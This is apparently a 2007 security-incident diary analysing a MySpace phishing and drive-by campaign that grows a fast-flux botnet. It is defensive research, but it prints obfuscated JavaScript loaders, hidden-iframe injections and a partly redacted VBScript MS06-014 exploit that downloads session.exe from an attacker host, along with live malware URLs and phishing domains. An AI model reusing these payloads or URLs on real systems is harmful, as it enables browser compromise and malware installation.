My next class:

MySpace Phish and Drive-by attack vector propagating Fast Flux network growth

Published: 2007-06-26. Last Updated: 2007-06-29 23:14:38 UTC
by Johannes Ullrich (Version: 3)
0 comment(s)

UPDATE: Skip down to Section 2007-06-28

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.

  FluxBot (aka "Fast-Flux") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.
Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

A typical excerpt from an infected profile (obfuscated to protect the innocent):

<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusa nbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>

The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded javascript which decodes to:
<script>window.status="Done"</script>
<iframe src="http://fafb 4c4c .com/header_03.gif" width=1
height=1></iframe>

    The domain used here is of course again served via flux. header_03.gif

<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>



   Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:
(Warning: live malware URLs visit at your own risk)

http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen among others these
URLs:
http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

http://fcs.camgenie .com/weby7.exe

Settings for the bot can be found here:
http://settings.iconnectyou .biz

once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.

Couple IPs that may be worthwhile to block:
AS13767   | 72.232.254.218 
AS15083   | 65.111.176.176
AS25761   | 72.20.18.86    
AS25761   | 72.20.6.10   

As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team. 

UPDATE!  2007-06-28

MySpace Phish/Drive-by attack vector propagating Fast Flux network growth

Two primary infection vectors have been observed providing us with unique insight into the life cycle involved in propagating a fast flux service network.  The attack vectors include:

  • Compromised MySpace Member profiles redirecting to phishing sites (this has been discussed here)
  • SWF Flash image malicious redirection to Phishing and drive-by browser exploit attempt.

All Flash redirects were observed redirecting browsers to http://www.e44 7aa2.com    (****CAREFUL****)
( e447aa2.com is a domain currently serviced by this flux network with wildcard DNS resolution )

$ GET http://www.e44 7aa2.com

<HTML>
<HEAD>
<meta http-equiv="refresh" content="1;url=http://login.my space.cfm.fuseaction.splash.myto ken.76701a26.da3e.44a3a17b.e44 7aa2.com/da3e/index.php" />
</HEAD>
</HTML>

(The above URL is only a single example of potentially infinite permutations)

By following the above /da3e/index.php link results in a credible looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:

<!-- onRequestEnd -->
<script>window.status="Done"</script><iframe src="
../.footer_01.gif" width=0 height=0></iframe>

 The IFrame rendered /.footer_01.gif (not an actual gif but instead an encoded/obfuscated JavaScript snippet)

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 The decoded result of the above /.footer_01.gif is:

<script>window.status="Done"</script>
<iframe src="
http://fafb 4c4c.com/header_03.gif" width=1 height=1></iframe>

 The IFrame rendered /header_03.gif (served in flux) results in another JavaScript encoded/obfuscated file:

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74

REMOVED

?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%

REMOVED

dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 For which the decoded result of the above /header_03.gif is:

<script>window.status="Done"</script>
<iframe src="
http://fafb 4c4c.com/routine.php" width=1 height=1></iframe>

Following the IFrame rendered /routine.php file results in another JavaScript encoded/obfuscated file:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Routine Session ID: ca0910cWc01bT69aeA7e3030d1f52a45</title>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

\"lpwvgp%08y\"+*pmppGgnflcj\"lmkvalwd%08< vrkpaqctch-vzgv?gr{v\"vrkpaq>"));
</SCRIPT>        

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
</head>

<body onload="doesnotexist()">
<SCRIPT Language="JavaScript">
eval(unescape("

REMOVED

"));
</SCRIPT>
</body>
</html>

The decoded result of  /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) for which Microsoft released a patch in May 2006.

<script type="text/javascript">
function handleError() {
return true;
}
window.onerror = handleError;
</script>

<script>window.status="Done"</script>
<SCRIPT language="VBScript">
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0  Then
REMOVED
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "
GET","http://fafb 4c4c.com/session.exe",False
obj_msxml2.send
REMOVED
End If
</SCRIPT>

The successful compromise of a windows host via this exploit content results in the download of a malicious downloader stub executable (session.exe) that is then responsible for attempting to download additional malicious components necessary for integration of new compromised hosts into a fast flux service network.

The malware stub (session.exe) above attempts to download and execute the following components:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
http://fcs.camgenie .com/weby7.exe

Now back to these Evil Flash File Redirects:

What follows is just a representative sampling of URLs for imageshack.us site hosted flash files which perform one simple action, an action-script based browser redirect to a fast flux service network hosted combination phishing and drive by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014).

All files are exactly the same based on same md5 and sha1 hash for all files:

MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740

Imageshack HTTP Server maintained mtime suggest a deployment time of 2007-06-05 03:56:30-0700

Decompiling a flash component results in the discovery of that terrible redirect:

$ swfdump -atp ./img527.imageshack.us/img527/3530/38023350se6.swf
[HEADER]        File version: 8
[HEADER]        File size: 98
[HEADER]        Frame rate:
120.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        28 DOACTION
                 (   24 bytes) action: GetUrl URL:"
http://www.e447 aa2.com" Label:""
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (
00:00:00,000)
[000]         0 END
 

Where in the world are Flash files like the above being hosted?

http://img116.imagesh ack.us/img116/1299/97231039qx0.swf
http://img116.imagesh ack.us/img116/1424/81562934sa1.swf
http://img116.imagesh ack.us/img116/1699/63088115dg4.swf

REMOVED >100 URLS ( You get the idea )

http://img527.imagesh ack.us/img527/9186/77432798oc4.swf
http://img527.imagesh ack.us/img527/9573/87356429cb0.swf
http://img527.imagesh ack.us/img527/9696/66658005sg8.swf
http://img527.imagesh ack.us/img527/9828/13582837lk5.swf

Several Hundred MySpace profiles were discovered injected with links to phishing, and it is easy to imagine that many more were affected.

home.myspace.com.index.cfm.fusea ction.user.mytoken.0c38outb.h5v 17lt.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0en0r8xd.1155 34a.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0l3ttn77.oqr hldv.com

HUNDREDS OF URLS REMOVED

home.myspace.com.index.cfm.fusea ction.user.mytoken.1wr4sm8c.lw h gvcq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.257k51r.uhq0 1o6.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dd2l3w6.gcp 8tr9.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dp2cvwv.at6 pyss.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.304165k.xt3c gyq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3gcri4jk.jk33v 96.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3kuto9a4.de0 82ak.com

Flux!  It's SO easy to miss!

This write up is not geared to address the more complex overview of what a fast flux service network is (but is forthcoming).  Essentially all URLs involved in this fast flux service network are served by compromised hosts redirecting their HTTP and DNS traffic to another upstream Mothership host. 

;; ANSWER SECTION:
at6pyss.com.            179     IN      A       206.255.81.68 [h68.81.255.206.cable.htsp.cablelynx.com]
at6pyss.com.            179     IN      A       67.161.240.98 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com.            179     IN      A       67.190.48.71 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com.            179     IN      A       70.241.113.51 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       70.250.117.30 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       71.140.90.107 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com.            179     IN      A       71.146.88.77 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       71.146.144.141 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       75.31.235.68 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com.            179     IN      A       76.80.255.40 [cpe-76-80-255-40.socal.res.rr.com]

Check back on the above DNS results, the same goes for any domains referenced above.

The concept of Flux may unfold before very your eyes.
;; AUTHORITY SECTION:
at6pyss.com.            172799  IN      NS      ns1.welcometothechallenge.hk.
at6pyss.com.            172799  IN      NS      ns1.kanjerida.hk.
at6pyss.com.            172799  IN      NS      ns1.phudisarida.hk.
at6pyss.com.            172799  IN      NS      ns1.myheroisyourslove.hk.
 

 

Keywords:
0 comment(s)
My next class:

Comments


Diary Archives